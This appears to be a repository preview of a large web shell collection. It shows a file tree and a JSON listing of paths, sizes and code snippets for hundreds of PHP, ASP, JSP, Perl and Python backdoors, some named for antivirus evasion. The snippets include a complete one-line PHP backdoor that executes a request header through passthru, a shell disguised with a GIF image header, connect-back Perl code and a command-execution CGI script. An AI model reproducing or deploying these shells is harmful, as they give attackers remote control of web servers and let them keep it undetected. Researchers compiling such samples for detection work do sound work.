│ ├── bdotw44shell.txt │ │ ├── bug (1).php │ │ ├── bug.php │ │ ├── bypass.txt │ │ ├── c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php │ │ ├── c100.txt │ │ ├── c37.php │ │ ├── c66.php │ │ ├── c99-bd.txt │ │ ├── c99-shadows-mod.php │ │ ├── c99.php │ │ ├── c99.txt │ │ ├── c993.txt │ │ ├── c99_2.txt │ │ ├── c99_PSych0.php │ │ ├── c99_locus7s.txt │ │ ├── c99_madnet.txt │ │ ├── c99_w4cking.txt │ │ ├── c99madshell.php │ │ ├── c99shell.php │ │ ├── c99ud.txt │ │ ├── c99unlimited.txt │ │ ├── c99v2.php │ │ ├── cbfphpsh.txt │ │ ├── cihshell_fix.php │ │ ├── cmd.php │ │ ├── cmd.txt │ │ ├── co.php │ │ ├── connect-back.php.txt │ │ ├── cpanel.txt │ │ ├── cpg_143_incl_xpl.php │ │ ├── ctt_sh.txt │ │ ├── cybershell.txt │ │ ├── dC3 Security Crew Shell PRiV.txt │ │ ├── dC3.Security.Crew.Shell.priv8.txt │ │ ├── egy.txt │ │ ├── erne.txt │ │ ├── ex0shell.txt │ │ ├── fx.txt │ │ ├── g00nshell-v1.3.txt │ │ ├── g00nv13.php │ │ ├── gfs_sh.txt │ │ ├── h4ntu shell [powered by tsoi].php │ │ ├── h4ntu shell [powered by tsoi].txt │ │ ├── hkrkoz.php │ │ ├── iMHaPFtp.txt │ │ ├── ironshell.txt │ │ ├── isko.txt │ │ ├── iskorpitx.txt │ │ ├── itsecteam.v2.1.txt │ │ ├── itsecteam_shell.php │ │ ├── jHn.php │ │ ├── knullsh.txt │ │ ├── kolang-bypass.txt │ │ ├── kral.txt │ │ ├── lamashell.txt │ │ ├── list.php │ │ ├── load_shell.txt │ │ ├── locus.txt │ │ ├── log.txt │ │ ├── lolipop.txt │ │ ├── lostDC.txt │ │ ├── ly0kha.txt │ │ ├── matamu.txt │ │ ├── megabor.txt │ │ ├── metaslsoft.php │ │ ├── mini.j0s_ali.j0e.v27.9.txt │ │ ├── myshell.txt │ │ ├── mysql.txt │ │ ├── mysql_tool.txt │ │ ├── mysqlwebsh.php │ │ ├── newsh.php │ │ ├── nshell.txt │ │ ├── nst.txt │ │ ├── nstview.txt │ │ ├── p0isoN.sh3ll.txt │ │ ├── pHpINJ.txt │ │ ├── php-backdoor.txt │ │ ├── php-include-w-shell.txt │ │ ├── phpjackal1.3.txt │ │ ├── phpshell.php │ │ ├── priv8-2012-bypass-shell.txt │ │ ├── pws.txt │ │ ├── r57-bd.txt │ │ ├── r57.1.4.0.php │ │ ├── r57.mod-bizzz.shell.txt │ │ ├── r57.php │ │ ├── r57.txt │ │ ├── r57142.php │ │ ├── r57_Mohajer22.txt │ │ ├── r57_iFX.txt │ │ ├── r57_kartal.txt │ │ ├── r57shell1.40.txt │ │ ├── r57shell2.0.txt │ │ ├── redcod.php │ │ ├── remview_fix.php │ │ ├── rootshell.txt │ │ ├── ru24_post_sh.txt │ │ ├── s72 Shell v1.1 Coding.php │ │ ├── s72 Shell v1.1 Coding.txt │ │ ├── safe0ver.txt │ │ ├── shellzx.txt │ │ ├── simattacker.txt │ │ ├── simple-backdoor.txt │ │ ├── simple_cmd.txt │ │ ├── small.txt │ │ ├── sniper.txt │ │ ├── soldierofallah.txt │ │ ├── sosyete.txt │ │ ├── spygrup.txt │ │ ├── sql.php │ │ ├── stres.txt │ │ ├── ugdevil.v2.0.txt │ │ ├── up.php │ │ ├── uploader.txt │ │ ├── wso.v2.5.txt │ │ ├── wso2.5.php │ │ ├── wso2.php │ │ ├── x0rg.byp4ss.txt │ │ └── zacosmall.txt │ ├── PL/ │ │ ├── Perl Web Shell by RST-GHC.pl │ │ ├── cgitelnet.txt │ │ ├── cmd.pl │ │ ├── dc.pl │ │ ├── list.pl │ │ └── up.pl │ └── README.md ├── webshell-free/ │ ├── README.md │ └── php/ │ └── Exception.php ├── wsMemShell/ │ ├── Godzilla.java │ ├── WsCmd.java │ ├── readme.md │ ├── weblogic/ │ │ ├── wsAddAllContainer.jsp │ │ └── wscmd.jsp │ ├── wscmd.jsp │ └── wsproxy.jsp ├── www-7jyewu-cn/ │ ├── DOC_ZIBSZXBIEG.php │ ├── README.md │ ├── UnKnown 高级Vip防删收费版 (1).asp │ ├── UnKnown 高级Vip防删收费版.asp │ ├── aspmuma.asp │ ├── aspx经典大马.aspx │ ├── asp小马.asp │ ├── 不灭之魂2013改进版本.asp │ ├── 不灭之魂2014改进版本.asp │ ├── 传说中的草泥马4.0 (1).asp │ ├── 传说中的草泥马4.0.asp │ ├── 免杀php大马.php │ ├── 国外免杀PHP大马_未翻译.php │ ├── 国外免杀php大马.php │ ├── 土司搞基asp大马 (1).asp │ ├── 土司搞基asp大马 (1)_重命名_2014-10-23-14-54-16.asp │ ├── 土司搞基asp大马.asp │ ├── 拿站小助手-经典Asp小马.asp │ ├── 星外虚拟机提权专用asp大马 (1).asp │ ├── 星外虚拟机提权专用asp大马 (1)_重命名_2014-10-23-14-54-16.asp │ ├── 星外虚拟机提权专用asp大马.asp │ ├── 最新过安全狗- 免杀PHP大马 -.php │ ├── 法克僵尸大马 (1).asp │ ├── 法克僵尸大马.asp │ ├── 火狐NEW WebShell (1).asp │ ├── 火狐NEW WebShell (1)_重命名_2014-10-23-14-54-16.asp │ ├── 火狐NEW WebShell.asp │ ├── 牛逼免杀提权隐藏大马 (1).asp │ ├── 牛逼免杀提权隐藏大马 (1)_重命名_2014-10-23-14-54-16.asp │ ├── 牛逼免杀提权隐藏大马.asp │ ├── 银河舰队大马_2012版.asp │ ├── 银河舰队大马_2014版.asp │ └── 非常牛逼的Jsp大马.jsp ├── xakep-shells/ │ ├── ASP/ │ │ ├── Ajan.asp.txt │ │ ├── CMD.asp.txt │ │ ├── CmdAsp.asp.txt │ │ ├── CyberSpy5.Asp.txt │ │ ├── EFSO_2.asp.txt │ │ ├── Elmali Seker.asp.txt │ │ ├── NT Addy.asp.txt │ │ ├── Rader.asp.txt │ │ ├── Reader.asp.txt │ │ ├── RemExp.asp.txt │ │ ├── Server Variables.asp.txt │ │ ├── Tool.asp.txt │ │ ├── Zehir 4.asp.txt │ │ ├── aspydrv.asp.txt │ │ ├── cmd-asp-5.1.asp.txt │ │ ├── elmaliseker.asp.txt │ │ ├── indexer.asp.txt │ │ ├── kacak.asp.txt │ │ ├── klasvayv.asp.txt │ │ ├── ntdaddy.asp.txt │ │ └── zehir4.asp.txt │ ├── CGI/ │ │ ├── WebShell.cgi.txt │ │ ├── go-shell.cgi.txt │ │ ├── lurm_safemod_on.cgi.txt │ │ └── telnet.cgi.txt │ ├── JSP/ │ │ ├── Java Shell.js.txt │ │ ├── JspWebshell 1.2.jsp.txt │ │ ├── cmdjsp.jsp.txt │ │ ├── jsp-reverse.jsp.txt │ │ └── jspshall.jsp.txt │ ├── PERL/ │ │ ├── Asmodeus v0.1.pl.txt │ │ ├── connectback2.pl.txt │ │ ├── perlbot.pl.txt │ │ ├── shellbot.pl.txt │ │ ├── telnet.pl.txt │ │ └── telnetd.pl.txt │ ├── PHP/ │ │ ├── 1.txt │ │ ├── 2008.php.php.txt │ │ ├── Ajax_PHP Command Shell.php.txt │ │ ├── Antichat Shell v1.3.php.txt │ │ ├── Antichat Socks5 Server.php.php.txt │ │ ├── Ayyildiz Tim -AYT- Shell v 2.1 Biz.html.txt │ │ ├── Casus15.php.php.txt │ │ ├── Crystal.php.txt │ │ ├── DTool Pro.php.txt │ │ ├── Dive Shell 1.0 - Emperor Hacking Team.php.txt │ │ ├── Dx.php.php.txt │ │ ├── DxShell.php.php.txt │ │ ├── Fatalshell.php.php.txt │ │ ├── GFS web-shell ver 3.1.7 - PRiV8.php.txt │ │ ├── KA_uShell.php.php.txt │ │ ├── KAdot Universal Shell v0.1.6.html.txt │ │ ├── LOTFREE.php.php.txt │ │ ├── Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt │ │ ├── Moroccan Spamers Ma-EditioN By GhOsT.php.txt │ │ ├── MySQL Web Interface Version 0.8.php.txt │ │ ├── Mysql interface v1.0.php.txt │ │ ├── NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt │ │ ├── NetworkFileManagerPHP.php.txt │ │ ├── Nshell (1).php.php.txt │ │ ├── PH Vayv.php.php.txt │ │ ├── PHANTASMA.php.txt │ │ ├── PHP Backdoor Connect.pl.php.txt │ │ ├── PHP Shell.php.php.txt │ │ ├── PHPRemoteView.php.txt │ │ ├── Private-i3lue.php.txt │ │ ├── Rem View.php.php.txt │ │ ├── Russian.php.php.txt │ │ ├── STNC.php.php.txt │ │ ├── Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt │ │ ├── Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt │ │ ├── SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt │ │ ├── SimShell 1.0 - Simorgh Security MGZ.php.txt │ │ ├── Sincap.php.php.txt │ │ ├── SnIpEr_SA Shell.php.txt │ │ ├── SpecialShell_99.php.php.txt │ │ ├── SsEs.php.php.txt │ │ ├── Test.php.php.txt │ │ ├── WinX Shell.html.txt │ │ ├── Worse Linux Shell.php.txt │ │ ├── aZRaiLPhp v1.0.php.txt │ │ ├── a_gedit.php.php.txt │ │ ├── accept_language.php.txt │ │ ├── ak74shell.php.php.txt │ │ ├── antichat.php.php.txt │ │ ├── backdoor1.php.txt │ │ ├── backdoorfr.php.txt │ │ ├── backup.php.php.txt │ │ ├── backupsql.php.php.txt │ │ ├── c100.php.txt │ │ ├── c2007.php.php.txt │ │ ├── c99madshell_v2.0.php.php.txt │ │ ├── c99madshell_v2.1.php.php.txt │ │ ├── c99php.txt │ │ ├── c99shell_v1.0.php.php.txt │ │ ├── crystal.txt │ │ ├── csh.php.php.txt │ │ ├── ctt_sh.php.php.txt │ │ ├── cyberlords_sql.php.php.txt │ │ ├── cybershell.php.php.txt │ │ ├── dC3 Security Crew Shell PRiV.php.txt │ │ ├── fuckphpshell.php.txt │ │ ├── gfs_sh.php.php.txt │ │ ├── h4ntu shell [powered by tsoi].txt │ │ ├── hidshell.php.php.txt │ │ ├── iMHaPFtp.php.php.txt │ │ ├── img.php.php.txt │ │ ├── ironshell.php.txt │ │ ├── lamashell.php.txt │ │ ├── load_shell.php.php.txt │ │ ├── mailer3.php.php.txt │ │ ├── matamu.php.txt │ │ ├── myshell.php.php.txt │ │ ├── mysql.php.php.txt │ │ ├── mysql_shell.php.txt │ │ ├── mysql_tool.php.php.txt │ │ ├── network.php.php.txt │ │ ├── nfm.php.php.txt │ │ ├── ngh.php.php.txt │ │ ├── nixrem.php.php.txt │ │ ├── nshell.php.php.txt │ │ ├── nst.php.php.txt │ │ ├── nstview.php.php.txt │ │ ├── pHpINJ.php.php.txt │ │ ├── php-backdoor.php.txt │ │ ├── php-include-w-shell.php.txt │ │ ├── phpbackdoor15.php.txt │ │ ├── phpjackal.php.txt │ │ ├── phpshell17.php.txt │ │ ├── phvayv.php.php.txt │ │ ├── phvayvv.php.php.txt │ │ ├── predator.php.php.txt │ │ ├── pws.php.php.txt │ │ ├── r57 Shell.php.php.txt │ │ ├── r57.php.php.txt │ │ ├── r577.php.php.txt │ │ ├── r57shell.php.php.txt │ │ ├── rootshell.php.txt │ │ ├── rst_sql.php.php.txt │ │ ├── ru24_post_sh.php.php.txt │ │ ├── s.php.php.txt │ │ ├── s72 Shell v1.1 Coding.html.txt │ │ ├── s72_shell.txt │ │ ├── sh.php.php.txt │ │ ├── shankar.php.php.txt │ │ ├── shell.php.php.txt │ │ ├── simple-backdoor.php.txt │ │ ├── simple_cmd.html.txt │ │ ├── small.php.php.txt │ │ ├── sniper_sa_shell.txt │ │ ├── spy.php.php.txt │ │ ├── sql.php.php.txt │ │ ├── uploader.php.php.txt │ │ ├── w.php.php.txt │ │ ├── w3d.php.php.txt │ │ ├── w4k.php.php.txt │ │ ├── wacking.php.php.txt │ │ ├── webadmin.php.php.txt │ │ ├── webshell.php.txt │ │ ├── wso.txt │ │ ├── xinfo.php.php.txt │ │ └── zacosmall.php.txt │ ├── PY/ │ │ ├── Phyton Shell.py.txt │ │ ├── cgi-python.py.txt │ │ ├── smtpd.py.txt │ │ └── wh_bindshell.py.txt │ ├── README.md │ └── others/ │ └── tools/ │ └── DefaceKeeper_0.2.php.txt ├── xl7dev/ │ └── webshell/ │ └── other/ │ └── webshell/ │ └── read.me ├── zxc7528064/ │ └── -WebShell-/ │ └── README.md └── 几种实战成功过的webshell的免杀方式.md
Copy disabled (too large)
Download .json
Condensed preview — 1638 files, each showing path, character count, and a content snippet. Download the .json file for the full structured content (76,442K chars).
[
{
"path": ".github/FUNDING.yml",
"chars": 686,
"preview": "# These are supported funding model platforms\n\ngithub: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [u"
},
{
"path": ".gitmodules",
"chars": 3072,
"preview": "[submodule \"xl7dev/WebShell\"]\n\tpath = xl7dev/WebShell\n\turl = https://github.com/xl7dev/WebShell\n[submodule \"JohnTroony/p"
},
{
"path": "0xAbbarhSF/CTF-WebShells-/README.md",
"chars": 445,
"preview": "# CTF-WebShells-\nCollection of some Handy Capture The Flag 🟩 Web Shells .. Enjoy:D\n\n<img src=\"https://raw.githubusercont"
},
{
"path": "138shell/A/Ajan.asp.txt",
"chars": 1297,
"preview": "<SCRIPT LANGUAGE=\"VBScript\">\n<%\nSet entrika = CreateObject(\"Scripting.FileSystemObject\")\nSet entrika = entrika.CreateTex"
},
{
"path": "138shell/A/Ajax_PHP Command Shell.txt",
"chars": 17536,
"preview": "<?php\nsession_start();\n\nerror_reporting(0);\n\n$password = \"password\";\t\t //Change this to your password ;)\n\n$version = \"0."
},
{
"path": "138shell/A/Antichat Shell v1.3.txt",
"chars": 8998,
"preview": "<?php\n\nsession_start();\nset_time_limit(9999999);\n$login='virangar';\n$password='r00t';\n$auth=1;\n$version='version 1.3 by "
},
{
"path": "138shell/A/Asmodeus v0.1.pl.txt",
"chars": 1522,
"preview": "#!/usr/bin/perl\n\n#\n\n# Asmodeus v0.1\n\n# Perl Remote Shell\n\n# by phuket\n\n# www.smoking-gnu.org\n\n#\n\n# (Server is "
},
{
"path": "138shell/A/Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt",
"chars": 9827,
"preview": "<html>\n\n<head>\n<meta name=\"GENERATOR\" content=\"Microsoft FrontPage 5.0\">\n<meta name=\"ProgId\" content=\"FrontPage.Editor.D"
},
{
"path": "138shell/A/aZRaiLPhp v1.0.txt",
"chars": 10344,
"preview": "<?php\n$default=$DOCUMENT_ROOT;\n$this_file=\"./azrailphp.php\";\n\nif(isset($save)){\n$fname=str_replace(\" \",\"_\",$fname);\n$fna"
},
{
"path": "138shell/A/accept_language.txt",
"chars": 76,
"preview": "<?php passthru(getenv(\"HTTP_ACCEPT_LANGUAGE\")); echo '<br> by q1w2e3r4'; ?>\n"
},
{
"path": "138shell/B/Blind Shell.cpp.txt",
"chars": 2040,
"preview": "#include <string.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n#include <unistd.h>\n#include <netdb.h>\n#include <stdl"
},
{
"path": "138shell/B/backdoor1.txt",
"chars": 5758,
"preview": "<?\n/*\n Backdoor php v0.1\n Coded By Charlichaplin\n charlichaplin@gmail.com\n Join me: irc.fr.worldnet.net #s-c\n "
},
{
"path": "138shell/B/backdoorfr.txt",
"chars": 8944,
"preview": "<? \nprint(\"<html><head><title>Backdoor PHP code par rAidEn & LFL</title></head><body\nbgcolor=\\\"white\\\" LINK=\\\"blue\\\" VLI"
},
{
"path": "138shell/B/backup.php.txt",
"chars": 1264,
"preview": "<?php\ninclude (\"config.php\");db_connect();header('Content-Type: application/octetstream');header('Content-Disposition: f"
},
{
"path": "138shell/B/backupsql.php.txt",
"chars": 6331,
"preview": "<?php\n/*\n* Backup script on server.\n*\n* Runs on the server, called by Cron. Connects to the mySQL\n* database and creates"
},
{
"path": "138shell/B/backupsql.txt",
"chars": 6331,
"preview": "<?php\n/*\n* Backup script on server.\n*\n* Runs on the server, called by Cron. Connects to the mySQL\n* database and creates"
},
{
"path": "138shell/C/CMD.asp.txt",
"chars": 1468,
"preview": "<%@ Language=VBScript %>\n<%\n ' --------------------o0o--------------------\n ' File: CmdAsp.asp\n ' Author: Maceo <mace"
},
{
"path": "138shell/C/Casus15.php.txt",
"chars": 13640,
"preview": "<?php\n$default=$DOCUMENT_ROOT;\n$this_file=\"./casus15.php\";\n\n\n\nif(isset($save)){\n$fname=str_replace(\" \",\"_\",$fname);\n$fna"
},
{
"path": "138shell/C/CmdAsp.asp.txt",
"chars": 1428,
"preview": "<++ CmdAsp.asp ++>\n<%@ Language=VBScript %>\n<%\n' --------------------o0o--------------------\n' File: CmdAsp.asp\n' Author"
},
{
"path": "138shell/C/Crystal.txt",
"chars": 55429,
"preview": "<?\n\n\n\n\nerror_reporting(5);\n@ignore_user_abort(true);\n@set_magic_quotes_runtime(0);\n$win = strtolower(substr(PHP_OS, 0, 3"
},
{
"path": "138shell/C/CyberSpy5.Asp.txt",
"chars": 82499,
"preview": "<%@ LANGUAGE = VBScript.Encode %>\n<%#@~^FkQBAA==@#@&rU,2MDWMP\"n/!:nPg+aO@#@&?.\\DRU^.kaY:kh+6;DP~',{ Z!@#@&@#@&frh,1n/\t"
},
{
"path": "138shell/C/c100.txt",
"chars": 229103,
"preview": "<?php\n\n/******************************************************************************************\n* Locus7s Modified c"
},
{
"path": "138shell/C/c2007.php.txt",
"chars": 164313,
"preview": "<?php \n//Starting calls \nini_set(\"max_execution_time\",0); \nif (!function_exists(\"getmicrotime\")) {function getmicrotime("
},
{
"path": "138shell/C/c99(1).php.txt",
"chars": 134464,
"preview": "<?php\n$shver = \"1.0 beta (4.02.2005)\"; //Current version\n//CONFIGURATION\n$surl = \"?\"; //link to this script, INCLUDE \"?\""
},
{
"path": "138shell/C/c99.txt",
"chars": 151507,
"preview": "<?php\n/*\n******************************************************************************************************\n*\n*\t\t\t\t\t"
},
{
"path": "138shell/C/cgi-python.py.txt",
"chars": 3757,
"preview": "#!/usr/bin/python\n# 07-07-04\n# v1.0.0\n\n# cgi-shell.py\n# A simple CGI that executes arbitrary shell commands.\n\n\n# Copyrig"
},
{
"path": "138shell/C/connectback2.pl.txt",
"chars": 2099,
"preview": "#!/usr/bin/perl\nuse IO::Socket;\n#WwW.CoM Security Hackers \n#coded bY: MasterKid\n#We Are: MasterKid, AleXutz, Fa"
},
{
"path": "138shell/C/ctt_sh.php.txt",
"chars": 129036,
"preview": "<?php\n$timelimit = 60;\n$sul = \"?\";\n$rd = \"./\";\n$shver = \"0.1\";\n$login = \"\";\n$pass = \"\";\n$md5_pass = \"\";\n$login = false;\n"
},
{
"path": "138shell/C/ctt_sh.txt",
"chars": 129036,
"preview": "<?php\n$timelimit = 60;\n$sul = \"?\";\n$rd = \"./\";\n$shver = \"0.1\";\n$login = \"\";\n$pass = \"\";\n$md5_pass = \"\";\n$login = false;\n"
},
{
"path": "138shell/C/cybershell.php.txt",
"chars": 34089,
"preview": "<?\n/***************************************************************************\n * Cyber Shell"
},
{
"path": "138shell/C/cybershell.txt",
"chars": 34089,
"preview": "<?\n/***************************************************************************\n * Cyber Shell"
},
{
"path": "138shell/D/DTool Pro.txt",
"chars": 14444,
"preview": "<?php\n\nif(empty($chdir)) $chdir = @$_GET['chdir'];\nif(empty($cmd)) $cmd = @$_GET['cmd'];\nif(empty($fu)) $fu = @$_GET['fu"
},
{
"path": "138shell/D/Dive Shell 1.0 - Emperor Hacking Team.txt",
"chars": 5512,
"preview": "<?php\n\n/*Emperor Hacking TEAM */\n session_start();\nif (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {\n $_S"
},
{
"path": "138shell/D/Dx.php.txt",
"chars": 111604,
"preview": "<?php\n\n/*\n DDDDD SSSSS DxShell by _ Tync\n D D X X S\n D D X SSSSS http://hellknights.void."
},
{
"path": "138shell/D/Dx.txt",
"chars": 111604,
"preview": "<?php\n\n/*\n DDDDD SSSSS DxShell by _ Tync\n D D X X S\n D D X SSSSS http://hellknights.void."
},
{
"path": "138shell/D/DxShell_hk.php.txt",
"chars": 111839,
"preview": "<?php\n/*\n DDDDD SSSSS DxShell by _ Tync\n D D X X S\n D D X SSSSS http://hellknights.void.r"
},
{
"path": "138shell/D/dC3 Security Crew Shell PRiV.txt",
"chars": 43394,
"preview": "<?PHP\n/* \nver=5\n----------------------Only For Priv8 Use---------------------------------\n I dont support "
},
{
"path": "138shell/E/EFSO_2.asp.txt",
"chars": 161671,
"preview": "<%@ LANGUAGE = VBScript.Encode %>\n<%#@~^BgAAAA==vL[DMQIAAA==^#~@%>\n<%#@~^4BkAAA==@#@&B3w?}P2NN.PLP~sm/O8KXPDCDm0x9CUP"
},
{
"path": "138shell/E/Elmali Seker.asp.txt",
"chars": 63639,
"preview": "<%\n\n' Tac gia: forever5pi (theo huong dan cua anh vicki-vkdt)\n' Email : forever5pi@yahoo.com\n' Website: http://vnhacker."
},
{
"path": "138shell/E/elmaliseker.asp.txt",
"chars": 63639,
"preview": "<%\n\n' Tac gia: forever5pi (theo huong dan cua anh vicki-vkdt)\n' Email : forever5pi@yahoo.com\n' Website: http://vnhacker."
},
{
"path": "138shell/F/Fatalshell.php.txt",
"chars": 16317,
"preview": "<?php\nsession_start();\nerror_reporting(E_ALL ^ E_NOTICE);\nset_magic_quotes_runtime(0);\n@set_time_limit(0);\nif(@get_magic"
},
{
"path": "138shell/F/fuckphpshell.txt",
"chars": 9478,
"preview": "<?php \n\n\nerror_reporting(0); \nsession_start(); \n\nunset($user); // Just in case ;-] \nunset($pass); \n\nif ($_POST['cmd']"
},
{
"path": "138shell/G/GFS web-shell ver 3.1.7 - PRiV8.txt",
"chars": 24675,
"preview": "<?\n/*\n*************************\n* ###### ##### ###### *\n* ###### ##### ###### *\n* ## ## ## *\n* ## "
},
{
"path": "138shell/G/gfs_sh.php.txt",
"chars": 64151,
"preview": "<?\n/*\n*************************\n* ###### ##### ###### *\n* ###### ##### ###### *\n* ## ## ## *\n* ## "
},
{
"path": "138shell/G/gfs_sh.txt",
"chars": 64151,
"preview": "<?\n/*\n*************************\n* ###### ##### ###### *\n* ###### ##### ###### *\n* ## ## ## *\n* ## "
},
{
"path": "138shell/H/h4ntu shell [powered by tsoi].txt",
"chars": 2475,
"preview": "<title>h4ntu shell [powered by tsoi]</title>\n<?php\necho \"<p><font size=2 face=Verdana><b>This Is The Server Information<"
},
{
"path": "138shell/I/Inderxer.asp.txt",
"chars": 10052,
"preview": "<%@ LANGUAGE = VBScript.Encode %>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1254\">\n<meta http-"
},
{
"path": "138shell/I/iMHaPFtp.php.txt",
"chars": 53543,
"preview": "<?php\n/*\n * iMHaPFTP.php - iMHaBiRLiGi Php Ftp Editoru\n * Copyright (C) 2003-2005 iMHaBiRLiGi <iMHaBiRLiGi@imhabirligi."
},
{
"path": "138shell/I/iMHaPFtp.txt",
"chars": 53543,
"preview": "<?php\n/*\n * iMHaPFTP.php - iMHaBiRLiGi Php Ftp Editoru\n * Copyright (C) 2003-2005 iMHaBiRLiGi <iMHaBiRLiGi@imhabirligi."
},
{
"path": "138shell/I/img.php.txt",
"chars": 80801,
"preview": "GIF89a\n<?\n@session_start();\n@set_time_limit(0);\n@set_magic_quotes_runtime(0);\n@error_reporting(0);\n#####cfg#####\n# use p"
},
{
"path": "138shell/I/indexer.asp.txt",
"chars": 10052,
"preview": "<%@ LANGUAGE = VBScript.Encode %>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1254\">\n<meta http-"
},
{
"path": "138shell/I/ironshell.txt",
"chars": 18370,
"preview": "<?php\nerror_reporting(0); //If there is an error, we'll show it, k?\n\n$password = \"login\"; // You can put a md5 string he"
},
{
"path": "138shell/J/Java Shell.js.txt",
"chars": 2988,
"preview": "package enigma.shells.jython;\n\nimport java.io.*;\nimport java.awt.*;\nimport javax.swing.*;\n\nimport enigma.console.*;\nimpo"
},
{
"path": "138shell/J/JspWebshell 1.2.txt",
"chars": 25463,
"preview": "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java.sql.*,java.io.File,java.io.*,java.nio.charset"
},
{
"path": "138shell/K/KAdot Universal Shell v0.1.6.html.txt",
"chars": 4483,
"preview": "<!--\n\n/+--------------------------------+\\\n | KA_uShell |\n | <KAdot Universal Shell> |\n | "
},
{
"path": "138shell/K/Klasvayv.asp.txt",
"chars": 33663,
"preview": "<html>\n\n<head>\n<meta http-equiv=\"Content-Language\" content=\"tr\">\n<meta name=\"GENERATOR\" content=\"Microsoft FrontPage 5.0"
},
{
"path": "138shell/L/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt",
"chars": 1325,
"preview": "<?\necho \"<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit</font></b><br>\";\nprint_r('\n<pre"
},
{
"path": "138shell/L/lamashell.txt",
"chars": 2480,
"preview": "<?\nif($_POST['dir'] == \"\") {\n\n $curdir = `pwd`;\n} else {\n $curdir = $_POST['dir'];\n}\n\nif($_POST['king'] == \"\") {\n\n $curc"
},
{
"path": "138shell/L/load_shell.php.txt",
"chars": 13050,
"preview": "<?\nerror_reporting(0);\n/* Loader'z WEB Shell v 0.1.0.2 {15 2005}\n .\n- PHP. ( , , :)).\n- , ;)\n"
},
{
"path": "138shell/L/load_shell.txt",
"chars": 13050,
"preview": "<?\nerror_reporting(0);\n/* Loader'z WEB Shell v 0.1.0.2 {15 2005}\n .\n- PHP. ( , , :)).\n- , ;)\n"
},
{
"path": "138shell/L/lurm_safemod_on.cgi.txt",
"chars": 2556,
"preview": "#!/usr/bin/perl\n############################################################\n## Network security team "
},
{
"path": "138shell/M/Moroccan Spamers Ma-EditioN By GhOsT.txt",
"chars": 7180,
"preview": "<? \nif ($action==\"send\"){ \n$message = urlencode($message); \n$message = ereg_replace(\"%5C%22\", \"%22\", $message); \n$messag"
},
{
"path": "138shell/M/MySQL Web Interface Version 0.8.txt",
"chars": 34501,
"preview": "<?\n/*\n* MySQL Web Interface Version 0.8\n* -------------------------------\n* Developed By SooMin Kim (smkim@popeye.snu.ac"
},
{
"path": "138shell/M/Mysql interface v1.0.txt",
"chars": 33796,
"preview": "<?\n/*\n* Mysql interface v1.0\n* -------------------------------\n* Description :\n* Dung` de login vao` CSDL cua victim khi"
},
{
"path": "138shell/M/mailer3.php.txt",
"chars": 7180,
"preview": "<? \nif ($action==\"send\"){ \n$message = urlencode($message); \n$message = ereg_replace(\"%5C%22\", \"%22\", $message); \n$messag"
},
{
"path": "138shell/M/matamu.txt",
"chars": 3801,
"preview": "<?php\n\ndefine('PHPSHELL_VERSION', '1.7');\n\n?>\n\n<html>\n<head>\n<title> Matamu Mat </title>\n</head>\n<body>\n<hr><br>\n\n<?php\n"
},
{
"path": "138shell/M/myshell.php.txt",
"chars": 16113,
"preview": "<?php\n/*\n **************************************************************\n * MyShell "
},
{
"path": "138shell/M/mysql.php.txt",
"chars": 51961,
"preview": "<?php\n// mysql config: [this is for reading files through mysql]\n$mysql_use = \"yes\"; //\"yes\" or \"no\"\n$mhost = \"localhost"
},
{
"path": "138shell/M/mysql_shell.txt",
"chars": 34391,
"preview": "<?\n/*\n * MySQL Web Interface Version 0.8\n * -------------------------------\n * Developed By SooMin Kim (smkim@popeye.snu"
},
{
"path": "138shell/M/mysql_tool.php.txt",
"chars": 33081,
"preview": "<?php\n\n/*\n * MySQL Database Backup / Restore Tool\n *\n * Copyright (C) 2003 Mark Wraith. All rights reserved\n *\n * Graphi"
},
{
"path": "138shell/N/NCC-Shell.txt",
"chars": 2590,
"preview": "<center>\n<h1>.:NCC:. Shell v1.0.0</h1>\n<title>.:NCC:. Shell v1.0.0</title>\n<head><h2>Hacked by Silver</h2></head>\n<h1>--"
},
{
"path": "138shell/N/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt",
"chars": 49150,
"preview": "<?php\n$name=\"GaMMa\";\n$pass=\"Hack\";\n$demail =\"xakep@xaep.ru\";\nif (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || $HTTP_SER"
},
{
"path": "138shell/N/NT Addy.asp.txt",
"chars": 38849,
"preview": "<!--\n_______________________________________\n|NTDaddy v1.9 by obzerve of fux0r inc.|\n|=================================="
},
{
"path": "138shell/N/NetworkFileManagerPHP.txt",
"chars": 122249,
"preview": "<?\n\nif (ini_get('register_globals') != '1') {\n\n if (!empty($HTTP_POST_VARS))\n\n extract($HTTP_POST_VARS);\n\n\n\n if (!"
},
{
"path": "138shell/N/Nshell (1).php.txt",
"chars": 2874,
"preview": "<?php\n//code by navaro :d\n/***************************************/\n closelog( );\n/*\n echo \"<center>\";\n $user = get_c"
},
{
"path": "138shell/N/network.php.txt",
"chars": 122249,
"preview": "<?\n\nif (ini_get('register_globals') != '1') {\n\n if (!empty($HTTP_POST_VARS))\n\n extract($HTTP_POST_VARS);\n\n\n\n if (!"
},
{
"path": "138shell/N/nshell.php.txt",
"chars": 12816,
"preview": "??<head>\n<title> nShell v1.0</title>\n<style>\nhtml { overflow-x: auto }\nA: {font-weight:bold};\nA:link {COLOR:red; TEXT-DE"
},
{
"path": "138shell/N/nstview.php.txt",
"chars": 80661,
"preview": "<?\n@session_start();\n@set_time_limit(0);\n@set_magic_quotes_runtime(0);\nerror_reporting(E_ALL & ~E_NOTICE);\n#####cfg#####"
},
{
"path": "138shell/N/ntdaddy.asp.txt",
"chars": 38849,
"preview": "<!--\n_______________________________________\n|NTDaddy v1.9 by obzerve of fux0r inc.|\n|=================================="
},
{
